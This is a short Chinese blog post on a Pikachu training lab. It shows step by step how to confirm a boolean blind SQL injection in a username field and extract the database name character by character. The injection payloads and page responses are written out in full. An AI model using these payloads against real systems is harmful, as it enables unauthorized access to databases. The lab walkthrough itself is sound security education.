pikachu sql inject bool盲注
输入框中输入 已知用户名 kobe
显示了用户信息
your uid:3
your email is: kobe@pikachu
输入kobe'
看一下情况
显示
您输入的username不存在,请重新输入!
这还不能确定是否存在注入点,换一种方式
kobe' and 1=1 #
可以显示出kobe的数据,改为
kobe' and 1=2 #
显示
您输入的username不存在,请重新输入!
说明存在布尔盲注注入点
kobe' and ascii(substr(database(),1,1))>= 113 #
显示
您输入的username不存在,请重新输入!
kobe' and ascii(substr(database(),1,1))>= 112 #
显示
your uid:3
your email is: kobe@pikachu.com
ascii码112 就是p,通过这种方式可以将数据库名称字符一个个爆出
本文作者:明月照江江
本文链接:https://www.cnblogs.com/gradyblog/p/16839326.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步